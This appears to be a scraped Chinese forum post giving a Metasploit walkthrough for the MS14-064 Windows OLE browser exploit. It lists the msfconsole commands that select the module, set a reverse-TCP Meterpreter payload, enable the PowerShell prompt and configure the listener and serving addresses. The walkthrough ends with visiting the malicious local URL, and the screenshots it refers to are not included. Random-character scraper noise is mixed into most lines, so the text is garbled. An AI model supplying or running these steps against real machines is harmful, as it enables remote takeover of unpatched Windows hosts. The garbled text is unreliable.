; D1 v6 x" ^$ q. ^0 j3 A9 O; z 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
5 b7 f2 `0 ?$ e3 L
0 W5 W' `9 j: z/ s6 s! b$ l
& v! t0 d( k5 m) A 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
+ C; f# C+ H! d
b4 Y/ N9 b# F; z! E. ~8 [
], c7 G l+ d) w! I, \ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp/ p7 h. t1 T. y3 R' k
# p) _7 m9 ?& U# Q
0 \9 X+ C' _# g* f! @! x
set AllowPowershellPrompt true
6 J* V G$ q" s! |, ^5 V7 E, M/ j
+ B9 Z. S/ Q3 a7 b% }' L! Z: s
7 K# J, [6 S4 c+ ` Set LHOST 192.168.0.109: u! {* a& } ^: |5 m
8 b# Z9 Y: Z2 H% A; I; X& {0 ~8 o+ w, O
set SRVHOST 192.168.0.109
' f# v+ k) k2 t0 q) E- V
+ P- ? k, ~2 b; n% R1 z
( f# N% P5 e: H6 |6 f* \! ^+ b Set uripath share
, n1 m' T9 y& t5 Y) k0 S
2 ~; o. c8 C" [, w) ^) I6 |$ E
e; x/ J- {& m7 W Set srvport 80- B0 j: j, V: v# }
. R# h0 [- y2 ?3 L( o0 k
# j& D M$ Q. ^
9 h% }) H' z) I+ l( G% t- F
+ n P% X9 n& f0 g6 @
/ K& v) b& E. N2 }6 W
/ k$ D% @5 q+ Q; C# ? U
7 R* k! ^8 R ?1 m/ ]9 Y9 T
4 y( V; w2 ?* @0 z! c3 m. n0 i+ |" R * Z: r$ u: Y. o" Y
! S; I# M, T$ |9 c, b) R$ v8 x' }+ ?. D! ?; V, `4 G
0 l9 r- ^, Z+ g* Q; W4 t
! }! t+ e3 {% ]' }; Y) o! j7 g: }" K: e2 y+ J6 O
% G7 m' C6 Q3 M( g: |
0 s% @! K/ i" t- f2 L6 ?0 B2 W: d6 E* C
下面我们来访问本地地址如图:
- k8 O' L p) k7 M5 a
: F) k5 c" O% ]. T/ p
. j1 o0 h7 [6 F
; Z% U6 z; e0 E( l, m
6 ?1 c$ S0 j) j) |6 \# A
3 R+ ^( f) N7 j
8 M4 c6 z) K$ x; r6 ?, T& A2 V
. q l6 t3 }; n- S
6 U2 s+ G* F3 v3 W2 m! C" M1 r
0 r: H' D! \- K7 N; z5 |5 m+ D6 ?